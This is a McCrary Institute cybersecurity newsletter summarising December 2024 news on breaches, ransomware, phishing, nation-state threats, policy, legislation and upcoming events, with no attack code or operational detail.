TODAY'S TOP 5
McCrary Institute for Cyber & Critical Infrastructure Security
Working to protect and advance U.S. interests in the areas of cyber and critical infrastructure security.
WIDE-REACHING ROUTER BAN?: U.S. authorities are investigating whether a Chinese company whose popular home-internet routers have been linked to cyberattacks poses a national-security risk and are considering banning the devices, The Wall Street Journal reports. The router-manufacturer TP-Link, established in China, has roughly 65% of the U.S. market for routers for homes and small businesses. It is also the top choice on Amazon.com, and powers internet communications for the Defense Department and other federal government agencies.
DHS LAUNCHES UNDERSEA CABLE EFFORT: The Department of Homeland Security (DHS) released a white paper capturing key takeaways and policy workstreams from a series of engagements with leading owners, operators, vendors and manufacturers in the subsea fiber-optic cable industry. The paper focuses on the security, economic and regulatory aspects of the subsea telecommunications cable network. It highlights opportunities for DHS and its U.S. government partners to strengthen U.S. leadership in this vital industry.
BALL DROPPED ON AI RISK ASSESSMENTS: Sector risk management agencies were required to develop and submit initial risk assessments for each of the critical infrastructure sectors to DHS by this past January. Although the agencies submitted the sector risk assessments to DHS as required, none fully addressed the six activities that establish a foundation for effective risk assessment and mitigation of potential artificial intelligence risks, the Government Accountability Office reports.
LOCKING DOWN HIGH-VALUE COMMS: The Cybersecurity and Infrastructure Security Agency unveiled a detailed set of guidelines Wednesday to safeguard the mobile communications of high-value government targets in the wake of the ongoing Salt Typhoon telecom breach, CyberScoop reports. The guide aims to help both political and federal leadership harden their communications and avoid any data interception by the Chinese-linked espionage group.
NDAA PASSES WITH CYBER PROVISIONS: The Senate passed a defense bill 85-14 on Wednesday that authorizes significant pay raises for junior enlisted service members, aims to counter China’s growing power and boosts overall military spending to $895 billion, the Associated Press reports. The NDAA, which now heads to President Biden for his signature, also invests in new military technologies, including artificial intelligence, and bolsters the U.S. production of ammunition.
CYBER FOCUS PODCAST
In the latest episode of Cyber Focus, host Frank Cilluffo speaks with Manny Cancel, senior vice president at NERC and CEO of the Electricity Information Sharing and Analysis Center (E-ISAC). The conversation explores the evolving threat landscape impacting grid security, including challenges posed by ransomware, physical attacks and AI-driven cyber risks. Cancel highlights the importance of public-private collaboration, resilience engineering and supply chain security to mitigate nation-state and extremist threats. He also discusses the ISAC's role in information sharing, mutual aid programs and exercises such as GridEx to strengthen critical infrastructure defenses. Cancel shares insights on emerging technologies, operational technology (OT) convergence and preparing the next generation of cybersecurity leaders.
SUBSCRIBE TO CYBER FOCUS: YouTube | Spotify | Apple Podcasts
FROM McCRARY EXPERTS
The incoming administration must focus on cybersecurity policies that protect the energy sector
It is widely known that cyber adversaries regularly and increasingly target America’s critical infrastructure, and the threat facing the energy sector is only growing more severe, write McCrary Institute Director Frank Cilluffo and Deputy Director for Policy and Partnerships Kyle Klein. Now that the transition to the next administration is well underway, it is critical that the McCrary Institute’s joint report with the Cyberspace Solarium Commission 2.0 be weighed by whoever assumes the helm at the nation’s key cyber agencies next month. (POWERMAG.COM)
READ THE REPORT: Securing America’s Digital Future: A Bipartisan Cybersecurity Roadmap for the Next Administration
CYBER AND CI UPDATES
ATTACKS AND INCIDENTS
Cryptocurrency
LastPass breach comes back to haunt users as hackers steal $12 million in cryptocurrency
A major data breach at password manager firm LastPass in 2022 is still causing mayhem two years later, with cyber criminals using stolen information to carry out further attacks. According to data collated by crypto investigator ZachXBT, hackers stole $12.38 million in cryptocurrency from LastPass users on December 16 and 17. The attackers drained nearly 150 individual victim addresses, according to the analysis, with ZachXBT noting the stolen money was quickly converted into different currencies and syphoned away. (ITPRO.COM)
Cybercrime
Florida man pleads guilty to producing and distributing thousands of images depicting child sexual abuse using artificial intelligence
Justin Ryan Culmo pleaded guilty to multiple counts of production, possession, and distribution of tens of thousands of images and videos, including using generative artificial intelligence (AI) to create depictions of the sexual abuse of children following an investigation by Homeland Security Investigations (HSI) Tampa. (DHS.GOV)
Nigeria cracks down on cryptocurrency investment fraud and romance scams
The suspects, of various nationalities, including 148 Chinese and 40 Filipinos, two Kazakhstanis, one Pakistani and one Indonesian, were apprehended on December 10 in a surprise operation at their hideout in Lagos. The suspects allegedly used the facility, which could be mistaken for a corporate headquarters of a financial establishment, to train their Nigerian accomplices on how to initiate romance and investment scams using phishing techniques. (INFOSECURITY-MAGAZINE.COM)
Healthcare
Regional Care data breach impacts 225,000 people
The third-party insurance administrator is informing impacted individuals that their personal and medical information may have been compromised as a result of an incident identified in mid-September 2024. Regional Care discovered at the time that there had been some unusual activity on an account in its network. The compromised account was immediately shut down. (SECURITYWEEK.COM)
Leaks
Hacker leaks Cisco data
The notorious hacker IntelBroker announced in October that he and others had breached Cisco systems and obtained source code, certificates, credentials, confidential documents, encryption keys and other types of information. The hacker claimed to have obtained source code associated with several major companies. Cisco’s investigation showed that its systems had not been breached and that the data was actually obtained from a public-facing DevHub environment that serves as a resource center from where customers can obtain source code, scripts and other content. (SECURITYWEEK.COM)
Malware
Raccoon Stealer malware operator gets 5 years in prison after guilty plea
Mark Sokolovsky (also known as raccoon-stealer, Photix, and black21jack77777) and his conspirators rented the malware to other threat actors under a MaaS (malware-as-a-service) model for $75 per week or $200 monthly. After infecting a device, Raccoon Stealer collects and steals a wide range of data, including credentials, cryptocurrency wallets, credit card data, email data, and other sensitive information from dozens of applications. (BLEEPINGCOMPUTER.COM)
Phishing
How to lose a fortune with just one bad click
Adam Griffin is a battalion chief firefighter in the Seattle area, and on May 6 he received a call from someone claiming they were from Google support saying his account was being accessed from Germany. A Google search on the phone number calling him — (650) 203-0000 — revealed it was an official number for Google Assistant, an AI-based service that can engage in two-way conversations. At the same time, he received an email that came from a google.com email address, warning his Google account was compromised. (KREBSONSECURITY.COM)
Manufacturers lose Azure creds to HubSpot phishing attack
A full 20,000 employees of European manufacturing companies have been targeted by a phishing campaign. According to Palo Alto Networks' Unit 42, the activity peaked in June and survived until at least September. The cyberattackers targeted automotive, chemical, and industrial compound manufacturing companies, primarily in Western European countries like the UK, France, and Germany. The attackers' goal was to lure employees into divulging credentials to their Microsoft accounts, particularly in order to gain access to their enterprise Azure cloud environments. (DARKREADING.COM)
Phishing attacks double in 2024
A sharp increase in phishing attacks, including a 202% rise in overall phishing messages in the second half of 2024, has been identified by cybersecurity experts. According to SlashNext’s 2024 Phishing Intelligence Report, a substantial 703% surge in credential phishing attacks was also observed in the same period. Key findings from the study reveal that users encounter an average of one advanced phishing attack per mailbox every week. Mobile users face up to 600 threats annually, underscoring a shift away from email-only phishing to multichannel approaches. (INFOSECURITY-MAGAZINE.COM)
Ransomware
A new ransomware regime is now targeting critical systems with weaker networks
The year 2024’s ransomware shake-up, fueled by law enforcement crackdowns on giants like LockBit, has shifted focus to critical operations, with major attacks this year hitting targets like Halliburton, TfL, and Arkansas water plant. A Dragos study for the third quarter of 2024 highlighted a surge in activity from new groups like RansomHub, Play, and Fog, all exploiting VPN flaws and stolen credentials to gain footholds in critical systems using various living-of-the-land (LOTL) techniques. (CSOONLINE.COM)
Recovery
Arkansas City’s water treatment facility returns to regular operations after cyberattack
On Sept. 22, the Kansas city was notified of a ransomware attack targeting the water treatment facility’s primary server. The attack temporarily disrupted operations, but thanks to backup systems and manual controls, it did not interrupt water treatment services for residents. The attack required temporary adjustments at the facility and resulted in costs that will largely be covered by cyber insurance. (KSN.COM)
Pennsylvania county considering ransomware policy after January cyberattack
Washington County is preparing to implement a new policy on how to respond to future cybersecurity attacks after a ransomware strike crippled the county government for more than two weeks earlier this year. County solicitor Gary Sweat is asking the commissioners to consider approving a “business continuity and disaster contingency” plan that would have a protocol for county workers and its IT department to follow in the event of another cyber emergency. (HERALDSTANDARD.COM)
Supply chain
New attacks exploit VSCode extensions and npm packages
A recent investigation by security researchers has revealed a troubling surge in malicious campaigns exploiting popular development tools, including VSCode extensions and npm packages. These campaigns compromise local development environments and pose risks to broader software supply chains. (INFOSECURITY-MAGAZINE.COM)
THREATS
Artificial intelligence
Assessing the dangers of AI and biosecurity
Of the many potential threats posed by artificial intelligence (AI), few are more alarming than the possibility that AI would be used to create dangerous biological pathogens – accidentally or on purpose – and biosecurity experts are concerned that not enough is being done to guard against the dangers. It’s a classic example of the tug between the good and the frightening potential of AI: on the one hand, AI holds life-changing potential when it comes to helping scientists develop new medicines and vaccines; on the other, it may also be a tool for would-be bioterrorists. (THECIPHERBRIEF.COM)
Drones
U.S. has the tech to down Jersey drones — but not the policy, officials say
Counter-drone policy — not technology — is keeping U.S. agencies from responding more effectively to the reported drone sightings along the East Coast, U.S. officials said Tuesday. But that’s not stopping makers of anti-drone systems — including ones already protecting troops overseas — from showcasing their wares to protect airports and domestic infrastructure. (DEFENSEONE.COM)
After briefing, Intelligence panelists confident skies are safe
Members of the House Intelligence Committee left a classified briefing on Tuesday largely satisfied that there was nothing nefarious behind the recent uptick in alleged drone sightings over New Jersey that have sparked concerns and speculation from the press, social media users, Congress and the president-elect in recent weeks. Committee ranking member Jim Himes (D-Conn.) told reporters following the briefing that there was zero evidence of any laws being broken by the alleged drones, and that government officials assured lawmakers there were no federal operations taking place over the New Jersey area. (ROLLCALL.COM)
Infostealers
A lightweight app comes with some heavy consequences, researchers say
“BMI CalculationVsn” is the latest example of malicious software sneaked into an app store under the guise of being a simple tool for consumers. Spotted on the Amazon Appstore by researchers at antivirus company McAfee, the app was actually an infostealer with the ability to record screen activity, steal text messages and survey the list of the other apps on the device. (THERECORD.MEDIA)
OT/ICS
New Forescout research details persistent malware threats to OT/ICS engineering workstations
Forescout Technologies has analyzed data from a public malware repository, revealing a persistent presence of malware targeting operational technology and industrial control systems (OT/ICS). Notably, over 20 percent of these attacks are directed at engineering workstations, prompting Forescout to concentrate its efforts in this area. The researchers identified two incidents where Mitsubishi engineering workstations were compromised by the Ramnit worm. Additionally, they examined three new malware samples designed to disrupt Siemens engineering processes, which they named Chaya_003. (INDUSTRIALCYBER.CO)
Threat landscape
Former CISA Director Chris Krebs on cyberthreats: Expect an increase of offensive cyber activity
WATCH: Krebs, now SentinelOne chief intelligence officer, joins ‘Squawk Box’ to discuss the cybersecurity landscape, the challenges facing the incoming Trump administration, and more. (CNBC.COM)
Special ops leaders eye alarming levels of adversary collaboration
Adversaries of the United States have ramped up partnerships, both in combat and influence operations, in ways that may require the unique intervention abilities of the special operations community to avoid conflict. Christopher Maier, the outgoing assistant secretary for Special Operations-Low-Intensity Conflict, said at a Center for a New American Security event that SOF troops have recently increased work in the competition and crisis phases that often precede an armed conflict. (DEFENSENEWS.COM)
Vulnerabilities
BeyondTrust issues urgent patch for critical vulnerability in PRA and RS products
The vulnerability, tracked as CVE-2024-12356 (CVSS score: 9.8), has been described as an instance of command injection. An attacker could exploit the flaw by sending a malicious client request, effectively leading to the execution of arbitrary operating systems within the context of the site user. (THEHACKERNEWS.COM)
ADVERSARIES
China
China’s nuclear arsenal keeps growing amidst leadership purge: Pentagon report
At a time when the Chinese government is purging its officer rolls and dealing with a slowing economy, it has continued growing its nuclear arsenal and conventional arms ambitions, according to a new Pentagon report. That finding is part of the Pentagon’s congressionally mandated 2024 China Military Power Report, an annual document providing US insights into the People’s Liberation Army’s (PLA) strategy and weapons development. (BREAKINGDEFENSE.COM)
READ THE REPORT: Military and Security Developments Involving the People’s Republic of China (PRC) (DEFENSE.GOV)
Costa Rica and U.S. jointly identify alleged cyber intrusions from China
The Embassy of China in Costa Rica rejected accusations by the Costa Rican Government and the U.S. Embassy in San José regarding cyberattacks allegedly originating in China. In a joint statement, Costa Rica and the U.S. indicated that cyber intrusions by criminal groups located in China had been detected in Costa Rica’s telecommunications and technology systems. (TICOTIMES.NET)
Iran
Treasury targets facilitators for procuring sensitive navigational systems for Iran
he Islamic Revolutionary Guard Corps Aerospace Force Self-Sufficiency Jihad Organization (IRGC ASF SSJO) and other Iranian organizations rely on these strategic components that are necessary for the production and proliferation of unmanned aerial vehicles (UAVs) and missiles. Concurrent with this action, the U.S. Department of State is designating one individual and two entities involved in Iranian UAV and missile development. (TREASURY.GOV)
Russia
Midnight Blizzard taps phishing emails, rogue RDP nets
An ongoing cyber-espionage campaign by Russia's Midnight Blizzard threat group may be much larger in scope than generally assumed, targeting international entities in government, armed forces, and academic institutions, Trend Micro said in recently released research. At its peak in October, Trend Micro researchers observed Midnight Blizzard — which they track as Earth Koshchei — hitting as many as 200 entities a day with phishing emails containing a malicious Remote Desktop Protocol (RDP) file and red-team testing tools to take control of victim systems and steal data or plant malware on them. (DARKREADING.COM)
Threat actors abusing Cloudflare Workers service to deliver weaponized application
The Computer Emergency Response Team of Ukraine (CERT-UA) reported on December 17, 2024, that several web resources imitating the official “Army+” application page were detected, all published using Cloudflare Workers. The malicious websites prompt unsuspecting users to download an executable file named “ArmyPlusInstaller-v.0.10.23722.exe,” though the filename may vary. (CYBERSECURITYNEWS.COM)
GOVERNMENT AND INDUSTRY
Artificial intelligence
New Anthropic study shows AI really doesn’t want to be forced to change its views
AI models can deceive, new research from Anthropic shows. They can pretend to have different views during training when in reality maintaining their original preferences. There’s no reason for panic now, the team behind the study said. Yet they said their work could be critical in understanding potential threats from future, more capable AI systems. (TECHCRUNCH.COM)
Can artificial intelligence save us from shark attacks?
The project, called SharkEye, comes from marine biologists, software engineers, and FAA-certified drone pilots at UC Santa Barbara’s Benioff Ocean Science Laboratory. And by monitoring shark aggregations from the air, and utilizing their AI tech, they’re able to track the patterns of these sharks, and hopefully make predictions toward when to surf, and when to stay away. (SURFER.COM)
Regulations
SEC cybersecurity enforcement outlook uncertain as Trump 2.0 looms
Much of the public company filings resulting from the Securities and Exchange Commission’s first year of implementing a rule requiring the disclosure of “material” cybersecurity breaches have been vague and confusing, producing little value for investors, legal analysts said. The lack of Republican support for the rule at the SEC coupled with questions over its usefulness — as implemented so far — place it at risk of being rescinded or at least scaled back after President-elect Donald Trump takes office, they said. (CFODIVE.COM)
Proposed UK white hat legal shield fails in House of Lords
Under the Computer Misuse Act, access to a computer system without adequate consent from the system owner is illegal, heightening the legal risk of activities such as security research. The Holmes amendment would have created new defenses to CMA charges including that unauthorized access to a computer would not be illegal so long as "the person’s actions were necessary for the detection or prevention of crime," or "were justified as being in the public interest." (GOVINFOSECURITY.COM)
Social media
Supreme Court to hear TikTok case before ban deadline
The U.S. Supreme Court has decided to hear TikTok’s challenge to a law that would ban the popular social media app next month unless its Chinese owner sells it. The case is set for Jan. 10, nine days before TikTok is scheduled to be shut down in the U.S. In announcing its decision, the court instructed lawyers for TikTok and the government to prepare arguments around the question of whether the impending ban, which lawmakers feel is needed to block potential meddling by Chinese authorities, would violate the 1st Amendment. (LATIMES.COM)
Workforce
CFOs scramble for new AI talent amid fierce competition, report says
Corporate finance chiefs globally are scrambling to hire new artificial intelligence talent as they face growing pressure to leverage the technology in their operations, according to survey results published by finance software vendor Taulia, a subsidiary of SAP. Nearly half (45%) of finance leaders polled said they were looking to bring new personnel with AI expertise into their teams, Taulia said in its recent report, adding that competition for such talent is intense. (CFODIVE.COM)
LEGISLATIVE UPDATES
Anti-deepfake porn bill included in funding deal
A bill that seeks to fight the rise of deepfake pornography was included in the year-end government funding deal unveiled Tuesday, raising the prospect the legislation could cross the finish line in the coming days. The TAKE IT DOWN Act would criminalize nonconsensual intimate imagery, including content generated by artificial intelligence (AI), and would require platforms to take down such material after being notified of its existence. (THEHILL.COM)
HEALTHCARE SECURITY: Rep. Robin Kelly (D-Ill.) introduced legislation to direct the secretary of Health and Human Services to establish the Health Sector Cybersecurity Coordination Center and to create an initial grant program with $100 million to boost the cybersecurity efforts of small- and medium-sized hospitals. (H.R. 10455)
EVENTS
SUPPLY CHAIN SECURITY: On Dec. 19, the Center for Technology Innovation at Brookings will host a speech and fireside chat with White House National Economic Advisor Lael Brainard and Brookings Senior Fellow Darrell West in which they will discuss ways to strengthen and secure America’s supply chains.
ENERGY OUTLOOK: Daniel Yergin, vice chairman of S&P Global and a Pulitzer Prize-winning author, discusses the forces behind the evolving energy landscape and what they mean for the world energy outlook on Jan. 6 at the Atlantic Council.
NUCLEAR SECURITY: CSIS’ Project on Nuclear Issues will host a live debate on AI Integration in U.S. Nuclear Command, Control and Communications (NC3) on Jan. 24. As Russia continues its saber-rattling and China accelerates its nuclear buildup, should the United States increase its reliance on artificial intelligence to enhance resilient decision-making in its NC3 systems to prevent inadvertent escalation?
ZERO TRUST SUMMIT: This annual event on Feb. 19 in Washington, D.C., is presented by CyberScoop and will feature federal and industry tech and cybersecurity leaders discussing their firsthand experiences and strategies in laying the foundations for and establishing the major pillars of zero-trust cybersecurity.
SPACE SECURITY: Chatham House’s 2025 Space Security Conference online and in person on March 5 convenes policymakers and leaders from the private sector, multilateral organizations, academia and NGOs for a day of high-level interactive discussions examining conflict, competition and cooperation in outer space.
FOLLOW THE McCRARY INSTITUTE ON LINKEDIN | X | FACEBOOK
SUBSCRIBE TO THE CYBER FOCUS PODCAST: YOUTUBE | SPOTIFY | APPLE PODCASTS